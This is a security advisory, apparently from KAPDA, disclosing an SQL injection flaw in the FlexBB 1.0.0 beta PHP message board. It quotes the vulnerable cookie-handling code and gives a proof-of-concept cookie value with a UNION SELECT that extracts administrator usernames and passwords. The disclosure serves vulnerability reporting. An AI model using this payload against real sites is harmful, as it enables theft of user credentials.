KAPDA New advisory Vendor: http://www.flexbb.net Vulnerable Version: 1.0.0 10005 Beta Release 1 Bug: SQL Injection Exploitation: Remote with browser Description: -------------------- Flexbb is a freely available PHP-based message board program that uses a MySQL database. Vulnerability: -------------------- Sql Injection: The software does not properly validate user-supplied input that may allow a remote user to launch Sql injection attacks. There are multiple Input Validation errors, for example: // Code Snippet // Includes/Start.php // Lines #190-197 if($_COOKIE['flexbb_lang_id'] == "") { $lang_id = $config['default_lang_id']; } else { $lang_id = $_COOKIE['flexbb_lang_id']; //--->Input Validation Error } POC: -------------------- Condition: Magic quotes GPC = Off GET: http://example.com/flexbb/index.php?debug=1 Cookie Name = flexbb_lang_id Cookie Value = none' UNION SELECT 'en',`username`, `password`,1,1 FROM `flexbb_users` WHERE `group` = '4 original Advisory: -------------------- http://www.kapda.ir/advisory-481.html Solution: -------------------- No response from vendor, there is no solution at the time of this entry. Credit : -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] ________________________________________________________________________ ____________ TV dinner still cooling? Check out "Tonight's Picks" on Yahoo! TV. http://tv.yahoo.com/